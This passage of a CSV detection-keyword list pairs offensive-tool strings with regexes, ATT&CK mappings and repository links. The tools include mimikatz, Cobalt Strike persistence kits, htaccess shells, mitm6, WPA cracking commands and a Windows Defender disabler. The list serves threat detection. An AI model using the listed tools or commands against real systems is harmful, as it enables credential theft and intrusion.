T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::shadowcopies*",".{0,1000}misc\:\:shadowcopies.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::skeleton*",".{0,1000}misc\:\:skeleton.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::spooler*",".{0,1000}misc\:\:spooler.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::taskmgr*",".{0,1000}misc\:\:taskmgr.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::wp*",".{0,1000}misc\:\:wp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::xor*",".{0,1000}misc\:\:xor.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*MISC_HIJACKABLE_DLL*",".{0,1000}MISC_HIJACKABLE_DLL.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*miscbackdoorlnkhelp*",".{0,1000}miscbackdoorlnkhelp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*missile-command.txt*",".{0,1000}missile\-command\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MisterDaneel/pysoxy*",".{0,1000}MisterDaneel\/pysoxy.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","10","10","118","47","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z" "*MitchHS/DLL-Spoofer*",".{0,1000}MitchHS\/DLL\-Spoofer.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","9","1","60","7","2023-10-18T14:55:15Z","2023-10-18T14:34:38Z" "*mitchmoser/SharpShares*",".{0,1000}mitchmoser\/SharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/mitchmoser/SharpShares","1","1","N/A","9","3","296","45","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z" "*mitm6 --*",".{0,1000}mitm6\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*mitm6 -d *",".{0,1000}mitm6\s\-d\s.{0,1000}","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1611","237","2024-02-20T16:11:53Z","2018-01-10T21:27:28Z" "*mitm6.py*",".{0,1000}mitm6\.py.{0,1000}","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1611","237","2024-02-20T16:11:53Z","2018-01-10T21:27:28Z" "*mitmdump -*",".{0,1000}mitmdump\s\-.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*mitmdump -s aerosol.py*",".{0,1000}mitmdump\s\-s\saerosol\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*mitmdump*",".{0,1000}mitmdump.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","command-line version of mitmproxy","10","10","34405","3897","2024-04-29T11:28:51Z","2010-02-16T04:10:13Z" "*MITMf.py*",".{0,1000}MITMf\.py.{0,1000}","offensive_tool_keyword","MITMf","Framework for Man-In-The-Middle attacks","T1557 - T1192 - T1173 - T1185","TA0001 - TA0011 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/MITMf","1","1","N/A","N/A","10","3528","1057","2018-08-28T15:44:25Z","2014-07-07T11:13:51Z" "*mitmproxy*",".{0,1000}mitmproxy.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","N/A","10","10","34405","3897","2024-04-29T11:28:51Z","2010-02-16T04:10:13Z" "*mitmproxy.rb*",".{0,1000}mitmproxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*mitmsocks*",".{0,1000}mitmsocks.{0,1000}","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","0","N/A","N/A","1","33","11","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" "*mitmsocks4j*",".{0,1000}mitmsocks4j.{0,1000}","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy for Java","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","1","N/A","N/A","1","33","11","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" "*mitmweb*",".{0,1000}mitmweb.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","web-based interface for mitmproxy","10","10","34405","3897","2024-04-29T11:28:51Z","2010-02-16T04:10:13Z" "*MlCGkaacS5SRUOt*",".{0,1000}MlCGkaacS5SRUOt.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*Mobile-Security-Framework*",".{0,1000}Mobile\-Security\-Framework.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1564 - T1592 - T1547 - T1562","TA0010 - TA0011 - TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","0","N/A","N/A","10","16345","3116","2024-04-14T13:09:49Z","2015-01-31T04:36:01Z" "*Mobile-Security-Framework*",".{0,1000}Mobile\-Security\-Framework.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","16345","3116","2024-04-14T13:09:49Z","2015-01-31T04:36:01Z" "*moc.tnetnocresubuhtig.war//:sptth*",".{0,1000}moc\.tnetnocresubuhtig\.war\/\/\:sptth.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*MockDirUACBypass*",".{0,1000}MockDirUACBypass.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*MockDirUACBypassDll*",".{0,1000}MockDirUACBypassDll.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*Mockingjay_BOF.sln*",".{0,1000}Mockingjay_BOF\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*Mockingjay_BOF-main*",".{0,1000}Mockingjay_BOF\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*mod_auth_remote.phish.htaccess*",".{0,1000}mod_auth_remote\.phish\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_buster.py*",".{0,1000}mod_buster\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*mod_caucho.shell.htaccess*",".{0,1000}mod_caucho\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.bash.htaccess*",".{0,1000}mod_cgi\.shell\.bash\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.bind.htaccess*",".{0,1000}mod_cgi\.shell\.bind\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.windows.htaccess*",".{0,1000}mod_cgi\.shell\.windows\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_mono.shell.htaccess*",".{0,1000}mod_mono\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_multi.shell.htaccess*",".{0,1000}mod_multi\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_nikto.py*",".{0,1000}mod_nikto\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*mod_perl.embperl.shell.htaccess*",".{0,1000}mod_perl\.embperl\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_perl.IPP.shell.htaccess*",".{0,1000}mod_perl\.IPP\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_perl.Mason.shell.htaccess*",".{0,1000}mod_perl\.Mason\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_perl.shell.htaccess*",".{0,1000}mod_perl\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_php.shell.htaccess*",".{0,1000}mod_php\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_php.shell2.htaccess*",".{0,1000}mod_php\.shell2\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_php.stealth-shell.htaccess*",".{0,1000}mod_php\.stealth\-shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_python.shell.htaccess*",".{0,1000}mod_python\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_rivet.shell.htaccess*",".{0,1000}mod_rivet\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_ruby.shell.htaccess*",".{0,1000}mod_ruby\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_sendmail.rce.htaccess*",".{0,1000}mod_sendmail\.rce\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_shellshock.py*",".{0,1000}mod_shellshock\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*mod_wp_enum.py*",".{0,1000}mod_wp_enum\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*modDetective*",".{0,1000}modDetective.{0,1000}","offensive_tool_keyword","modDetective","modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in red team engagements and CTFs in order to pinpoint where escalation and attack vectors may exist. This is especially true in CTFs. in which files associated with the challenges often have a much newer modification date than standard files that exist from install.","T1003 - T1036 - T1057","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/itsKindred/modDetective","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--mode 3 --type handshake --essid * --verbose -d dicts/* --read *.cap*",".{0,1000}\-\-mode\s3\s\-\-type\shandshake\s\-\-essid\s.{0,1000}\s\-\-verbose\s\-d\sdicts\/.{0,1000}\s\-\-read\s.{0,1000}\.cap.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*--mode 3 --type pmkid --verbose -d dicts/* --read *.txt*",".{0,1000}\-\-mode\s3\s\-\-type\spmkid\s\-\-verbose\s\-d\sdicts\/.{0,1000}\s\-\-read\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*--mode com --acl --csv *",".{0,1000}\-\-mode\scom\s\-\-acl\s\-\-csv\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*--mode com --procmon *",".{0,1000}\-\-mode\scom\s\-\-procmon\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - 